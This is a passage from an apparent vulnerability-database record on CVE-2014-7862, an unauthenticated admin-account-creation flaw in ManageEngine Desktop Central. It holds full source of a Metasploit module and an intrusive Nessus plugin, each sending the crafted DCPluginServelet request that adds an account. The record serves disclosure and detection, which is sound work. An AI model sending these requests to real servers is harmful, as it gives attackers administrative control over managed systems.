should get released by next week or early second week. I'll send you an update on this.\"\n\n15/12/2014\n- Requested an update. Received reply on the 18th \"it has been handled from the Desktop Central side and awaiting for the release\".\n\n31/12/2014\n- Released information and exploit 112 days after initial disclosure.\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-07T22:55:18", "description": "This module exploits an administrator account creation vulnerability in Desktop Central from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in several versions of Desktop Central (including MSP) from v7 onwards.\n", "published": "2015-01-05T05:14:12", "type": "metasploit", "title": "ManageEngine Desktop Central Administrator Account Creation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7862"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/MANAGE_ENGINE_DC_CREATE_ADMIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Administrator Account Creation',\n 'Description' => %q{\n This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-7862'],\n ['OSVDB', '116554'],\n ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/2'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],\n ],\n 'DisclosureDate' => '2014-12-31'))\n\n register_options(\n [\n OptPort.new('RPORT', [true, 'The target port', 8020]),\n OptString.new('TARGETURI', [ true, 'ManageEngine Desktop Central URI', '/']),\n OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),\n OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),\n OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc'])\n ])\n end\n\n\n def run\n # Generate password hash\n salt = Time.now.to_i.to_s\n password_encoded = Rex::Text.encode_base64([Rex::Text.md5(datastore['PASSWORD'] + salt)].pack('H*'))\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"/servlets/DCPluginServelet\"),\n 'method' =>'GET',\n 'vars_get' => {\n 'action' => 'addPlugInUser',\n 'role' => 'DCAdmin',\n 'userName' => datastore['USERNAME'],\n 'email' => datastore['EMAIL'],\n 'phNumber' => Rex::Text.rand_text_numeric(6),\n 'password' => password_encoded,\n 'salt' => salt,\n 'createdtime' => salt\n }\n })\n\n # Yes, \"sucess\" is really mispelt, as is \"Servelet\" ... !\n unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/\n print_error(\"Administrator account creation failed\")\n end\n\n print_good(\"Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n connection_details = {\n module_fullname: self.fullname,\n username: datastore['USERNAME'],\n private_data: datastore['PASSWORD'],\n private_type: :password,\n workspace_id: myworkspace_id,\n access_level: 'Administrator',\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb"}], "nessus": [{"lastseen": "2021-01-20T12:02:12", "description": "The version of ManageEngine Desktop Central running on the remote host\nis affected by a remote security bypass vulnerability, due to a\nfailure to restrict access to 'DCPluginServelet'. This allows an\nunauthenticated, remote attacker to create an account with full\nadministrative privileges within DesktopCentral and then perform any\ntasks DesktopCentral administrative users could perform, including the\nexecution of code and commands on systems managed by DesktopCentral.", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-03-25T00:00:00", "title": "ManageEngine Desktop Central Remote Security Bypass (Intrusive Check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7862"], "modified": "2015-03-25T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_90109_USER_ADD.NASL", "href": "https://www.tenable.com/plugins/nessus/82080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82080);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7862\");\n script_bugtraq_id(71849);\n\n script_name(english:\"ManageEngine Desktop Central Remote Security Bypass (Intrusive Check)\");\n script_summary(english:\"Tries to add a user to the system.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby a security bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine Desktop Central running on the remote host\nis affected by a remote security bypass vulnerability, due to a\nfailure to restrict access to 'DCPluginServelet'. This allows an\nunauthenticated, remote attacker to create an account with full\nadministrative privileges within DesktopCentral and then perform any\ntasks DesktopCentral administrative users could perform, including the\nexecution of code and commands on systems managed by DesktopCentral.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Jan/2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 9 build 90109 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7862\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8040);\n\ninstall = get_single_install(\n app_name : appname,\n port : port\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\n\n# We add user as 'Guest' with an unusable password\nname = \"remove_me_nessus_\"+rand_str(charset:\"abcdefghijklmnopqrstuvwxyz0123456789\",length:10);\nurl = \"\";\nif(dir != \"/\")\n url = dir; \nurl += \"/servlets/DCPluginServelet?action=addPlugInUser&role=DCGuest&userName=\"+name+\"&email=graphich@mailinator.com&phNumber=8675309&password=rG3yK%2BI4jU%2FO9H4hPjY6VA%3D%3D&salt=1426703757554&createdtime=02181987\";\n\nres = http_send_recv3(\n port : port,\n method : \"POST\",\n item : url,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n);\nexp_request = http_last_sent_request();\n\nif ('message=\"Sucessfully added\"' >< res[2])\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n request : make_list(build_url(port:port,qs:url)),\n output : res[2],\n rep_extra : \"The non-functional user '\"+name+\"' was added to the system and must be removed.\",\n generic : TRUE\n );\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"ManageEngine Desktop Central\", install_url);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:02:12", "description": "The version of ManageEngine Desktop Central running on the remote host\nis affected by a remote security bypass vulnerability, due to a\nfailure to restrict access to 'DCPluginServelet'. This allows an\nunauthenticated, remote attacker to create an account with full\nadministrative privileges within DesktopCentral and then perform any\ntasks DesktopCentral administrative users could perform, including the\nexecution of code and commands on systems managed by DesktopCentral.", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-03-25T00:00:00", "title": "ManageEngine Desktop Central Remote Security Bypass", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7862"], "modified": "2015-03-25T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_90109_USER_ADD_SAFE.NASL", "href": "https://www.tenable.com/plugins/nessus/82081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82081);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7862\");\n script_bugtraq_id(71849);\n\n script_name(english:\"ManageEngine Desktop Central Remote Security Bypass\");\n script_summary(english:\"Checks the version of ManageEngine Desktop Central.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby a security bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine Desktop Central running on the remote host\nis affected by a remote security bypass vulnerability, due to a\nfailure to restrict access to 'DCPluginServelet'. This allows an\nunauthenticated, remote attacker to create an account with full\nadministrative privileges within DesktopCentral and then perform any\ntasks DesktopCentral administrative users could perform, including the\nexecution of code and commands on systems managed by DesktopCentral.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Jan/2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 9 build 90109 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7862\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\nif(build != UNKNOWN_VER)\n rep_version += \" Build \"+build;\ninstall_url = build_url(port:port, qs:dir);\n\n# 7 - 9 build 90109\nif (version !~ \"^[7-9](\\.|$)\")\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n\nif (version =~ \"^9(\\.|$)\" && build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\n\nif (int(build) < 90109)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 9 Build 90109' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-7862", "CVE-2014-8083", "CVE-2014-8084", "CVE-2014-7285", "CVE-2014-8085", "CVE-2014-7146"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-01-02T00:00:00", "published": "2015-01-02T00:00:00", "id": "SECURITYVULNS:VULN:14189", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14189", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
